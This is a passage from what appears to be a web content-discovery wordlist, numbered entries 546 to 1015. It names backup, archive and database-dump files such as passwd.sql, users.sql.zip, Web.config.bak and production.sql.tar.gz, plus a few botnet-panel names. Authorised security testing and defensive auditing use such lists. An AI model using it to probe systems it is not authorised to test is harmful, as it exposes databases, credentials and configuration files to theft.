functions.sql 546 | gbot_pannel.zip 547 | global.bak 548 | global.inc.php.bak 549 | Goold.sql 550 | Grading.sql 551 | green.zip 552 | group.bak 553 | groups.php.bak 554 | groups.sql 555 | guestbook.sql 556 | GUI.sql 557 | .gz 558 | .gzip 559 | header.php.bak 560 | Hierarchy.sql 561 | home.old 562 | htaccess.backup 563 | .htaccess.bak 564 | htaccess.bak 565 | .htaccess.old 566 | .htm.bak 567 | .html.bak 568 | html.bak 569 | .html.old 570 | html.old 571 | .htm.old 572 | i18n.sql 573 | Id.sql 574 | images.bak 575 | images.old 576 | images.sql 577 | images.zip 578 | img.db 579 | import.sql 580 | .inc.php.bak 581 | inculdes.bak 582 | index.asp.bak 583 | index.bak 584 | index.BAK 585 | indexes.sql 586 | index.htm.bak 587 | index.html.bak 588 | index.html.old 589 | index.old 590 | index.php~ 591 | index.php.bak 592 | index.php.old 593 | indexs.zip 594 | index.xml.gz 595 | index.zip 596 | .ini.bak 597 | init_db.sql 598 | init.sql 599 | insert_data.sql 600 | insert.sql 601 | installation.old 602 | install.bak 603 | install.old 604 | install.php.bak 605 | install.sql 606 | interwiki.sql 607 | intrusions.sql 608 | INVENTORY.sql 609 | ipsthumb.db 610 | IpsThumb.db 611 | javadd.tar.gz 612 | joomla.bak 613 | joomla.sql 614 | jquery.cookie.zip 615 | jquery.validate.zip 616 | .js.gz 617 | .jsp.old 618 | js.zip 619 | kisses.tar.gz 620 | langue.sql 621 | lib.model.schema.sql 622 | lib.old 623 | lib_phpconcerto.zip 624 | library.zip 625 | Library.zip 626 | LinkedServers.sql 627 | lists.old 628 | localhost.sql 629 | Logging.sql 630 | login.sql 631 | Logins.sql 632 | log.sql 633 | Makefile.old 634 | mcp.php.bak 635 | member.7z 636 | member.bak 637 | memberlist.php.bak 638 | member.rar 639 | members.7z 640 | member.sql.tar.gz 641 | member.sql.zip 642 | members.rar 643 | members.sql.tar.gz 644 | members.sql.zip 645 | members.tar.gz 646 | members.txt.gz 647 | members.zip 648 | member.tar.gz 649 | member.txt.gz 650 | member.zip 651 | menuleft.php.old 652 | menu.sql 653 | mgw_palm_pdb_patch.tar.gz 654 | migrate_Mambo4523_to_Joomla_100.sql 655 | mirserver1.rar 656 | mirserver4.rar 657 | mirserver.rar 658 | model.sql 659 | moods.sql 660 | mp3.sql 661 | ms_access_primer.zip 662 | mssql.7z 663 | mssql_basic.sql 664 | mssql.rar 665 | mssql_schema.sql 666 | mssql.sql.tar.gz 667 | mssql.sql.zip 668 | mssql.tar.gz 669 | mssql.txt.gz 670 | mssql.zip 671 | ms_word_sample.zip 672 | multinews.sql 673 | mysql.7z 674 | mysql_basic.sql 675 | mysql_data.sql 676 | mysql.data.sql 677 | mysql_db_install.sql 678 | mysql_db_remove.sql 679 | mysql.demo_data.dump 680 | mysql_demo.sql 681 | mysqldump.sql 682 | mysql.initial.sql 683 | mysql_innodb.sql 684 | mysql_install.sql 685 | mysql.lang.data.sql 686 | mysql_myisam.sql 687 | mysql.rar 688 | mysql_schema.sql 689 | mysql.sql.tar.gz 690 | mysql.sql.zip 691 | mysql.start.dump 692 | mysql_structure.sql 693 | mysql.structure.sql 694 | mysql_test_db.sql 695 | mysql.txt.gz 696 | mysql_zencart.sql 697 | mysql.zip 698 | n0ise.sql 699 | Nerastus.sql 700 | new_game.sql 701 | new_install.sql 702 | new_server.sql 703 | newsletter.sql 704 | news.old 705 | new.sql 706 | nicknames.bak 707 | Northwind.db 708 | note.sql 709 | nuke.sql 710 | .old 711 | .Old 712 | .OLD 713 | .old.old 714 | oldsite.zip 715 | optimize.sql 716 | oracle.7z 717 | oracle.rar 718 | oracle_schema.sql 719 | oracle.sql 720 | Oracle.sql 721 | oracle.sql.tar.gz 722 | oracle.sql.zip 723 | oracle.tar.gz 724 | oracle.txt.gz 725 | oracle.zip 726 | .org.zip 727 | oscommerce.sql 728 | otbb.old 729 | pagebuilder.backup 730 | Page.php.bak 731 | Panel.rar 732 | passwd.sql 733 | patch.sql 734 | pdfClassesAndFonts_009e.zip 735 | pdf_sample.zip 736 | Permissions.sql 737 | pgsql_db_install.sql 738 | pgsql_db_remove.sql 739 | pgsql.demo_data.dump 740 | pgsql.sql 741 | pgsql.start.dump 742 | photos.zip 743 | .php~ 744 | .php.backup 745 | .php.bak 746 | phpbb2.old 747 | phpBB2.old 748 | phpcms.sql 749 | phpcounter.sql 750 | .php.old 751 | plus.bak 752 | postgres_basic.sql 753 | postgresql.sql 754 | postgres_schema.sql 755 | postgres.sql 756 | posting.php.bak 757 | printenv.tmp 758 | prod.7z 759 | prod.rar 760 | prod.sql 761 | prod.sql.tar.gz 762 | prod.sql.zip 763 | prod.tar.gz 764 | prod.txt.gz 765 | production.7z 766 | production.rar 767 | production.sql 768 | production.sql.tar.gz 769 | production.sql.zip 770 | production.tar.gz 771 | production.txt.gz 772 | production.zip 773 | products.old 774 | prod.zip 775 | profile.sql 776 | publicus.ini.bak 777 | pwd.db 778 | qhtyvtt.BD 779 | query.sql 780 | rana.bd 781 | .rar 782 | .RAR 783 | Release.zip 784 | RenameForeignKeys.sql 785 | repositories.xml.zip 786 | RoleMemberships.sql 787 | root.backup 788 | rovine.sql 789 | RulesAndDefaults.sql 790 | sample_data.sql 791 | sampledata.sql 792 | sample.sql 793 | samples.sql 794 | sample.zip 795 | sandbox.db 796 | .save 797 | save.7z 798 | save.rar 799 | save.sql 800 | save.sql.tar.gz 801 | save.sql.zip 802 | save.tar.gz 803 | save.txt.gz 804 | save.zip 805 | Scheduling.sql 806 | schema_data.sql 807 | schema_mysql.sql 808 | schema.mysql.sql 809 | schema.sql 810 | schema.sqlite.sql 811 | Script.PostDeployment.sql 812 | Script.PreDeployment.sql 813 | script.sql 814 | scrum.zip 815 | search.old 816 | search.php.bak 817 | security.sql 818 | session.sql 819 | sessions.sql 820 | Sets.sql 821 | setting.sql 822 | settings.sql 823 | setup.sql 824 | Shared.sql 825 | shop.old 826 | Signatures.sql 827 | site.7z 828 | sitemap_1.xml.gz 829 | sitemap1.xml.gz 830 | sitemap_2.xml.gz 831 | sitemap_3.xml.gz 832 | sitemap_4.xml.gz 833 | sitemap_5.xml.gz 834 | sitemap.gz 835 | sitemap.html.bak 836 | sitemap.txt.gz 837 | sitemap.xml.gz 838 | sitemap.xml.old 839 | site.old 840 | site.rar 841 | site.sql 842 | site.sql.tar.gz 843 | site.sql.zip 844 | site.tar.gz 845 | site.txt.gz 846 | site.zip 847 | sliding_contact.php~ 848 | spade.tar.gz 849 | special.bak 850 | sproject.sql 851 | .sql 852 | .SQL 853 | SQL2000.sql 854 | sql_data.sql 855 | sqldump.sql 856 | SQL_gbot.zip 857 | .sql.gz 858 | sqlite3.sql 859 | sqlite.db 860 | sqlite.demo_data.dump 861 | sqlite.initial.sql 862 | sqlite_schema.sql 863 | sqlite.sql 864 | sqlite.start.dump 865 | sql_server.sql 866 | SQLServer.sql 867 | sql.sql 868 | staff.sql 869 | state.sql 870 | stations.db 871 | stats.old 872 | stone.xz 873 | store.bak 874 | structure.sql 875 | style.php.bak 876 | stylesheets.sql 877 | styles.php.bak 878 | tabledefs.sql 879 | table_schema.sql 880 | table.sql 881 | tables.sql 882 | Tagging.sql_data 883 | .tar 884 | .tar.bz2 885 | tar.bz2 886 | .tar.gz 887 | tar.gz 888 | tasks.db 889 | taxonomy.sql 890 | teardown.sql 891 | te.backup 892 | tempfile.2.tmp 893 | tempfile.3.tmp 894 | tempfile.4.tmp 895 | tempfile.tmp 896 | templates.sql 897 | test2.zip 898 | test.7z 899 | test.asp.bak 900 | test.bac 901 | test.bak 902 | testB.sql 903 | testData.sql 904 | test.db 905 | test.dmp 906 | test.old 907 | test_PostgreSQL.sql 908 | testRunner.sql 909 | test.sql.tar.gz 910 | test.sql.zip 911 | test.tar 912 | test.tar.gz 913 | testtbl.sql 914 | test.tmp 915 | test.trn 916 | test.txt.gz 917 | Test.zip 918 | themes.old 919 | theme.sql 920 | thumbs.db 921 | Thumbs.db 922 | tiny_mce.tar 923 | .tmp 924 | todo.sql 925 | training.old 926 | .txt.gz 927 | ucp.php.bak 928 | uninstall.sql 929 | unreal.zip 930 | update.7z 931 | update.rar 932 | update.sql.tar.gz 933 | update.sql.zip 934 | updates.sql 935 | update.tar.gz 936 | update.txt.gz 937 | update.zip 938 | upgrade_latest.sql 939 | upgrade.sql 940 | urllist.txt.gz 941 | user.7z 942 | user.rar 943 | users.7z 944 | user.sql.tar.gz 945 | user.sql.zip 946 | users.rar 947 | users.sql.tar.gz 948 | users.sql.zip 949 | users.tar.gz 950 | users.txt.gz 951 | users.zip 952 | user.tar.gz 953 | user.txt.gz 954 | user.zip 955 | u.sql 956 | v1.bak 957 | vbulletin.bak 958 | vbulletin.BAK 959 | vertexnet.sql 960 | viewforum.php.bak 961 | Views.sql 962 | viewtopic.php.bak 963 | visual_confirmation.zip 964 | wallpaper.bak 965 | webalizer.old 966 | web.bak 967 | Web.config.bak 968 | webdisk.backup 969 | webdisk.bd 970 | webdisk.old 971 | webdisk.tmp 972 | Webpanel.rar 973 | Webpanel.zip 974 | website.7z 975 | website.rar 976 | website.sql 977 | website.sql.tar.gz 978 | website.sql.zip 979 | website.tar.gz 980 | website.txt.gz 981 | website.zip 982 | willem.sql 983 | wordpress.7z 984 | wordpress.rar 985 | wordpress.sql 986 | wordpress.sql.tar.gz 987 | wordpress.sql.zip 988 | wordpress.tar.gz 989 | wordpress.txt.gz 990 | wordpress.zip 991 | world.sql 992 | wp.old 993 | ws.zip 994 | wusage.old 995 | www.7z 996 | www.backup 997 | www.bd 998 | www.bk 999 | www.db 1000 | www.gz 1001 | www.old 1002 | www.sql.tar.gz 1003 | www.sql.zip 1004 | www.tar.gz 1005 | www.tmp 1006 | www.txt.gz 1007 | www.xz 1008 | xcart.bak 1009 | .xml.gz 1010 | .xml.old 1011 | xzcore.xz 1012 | zemra.sql 1013 | .zip 1014 | .Zip 1015 | .ZIP 1016 | --------------------------------------------------------------------------------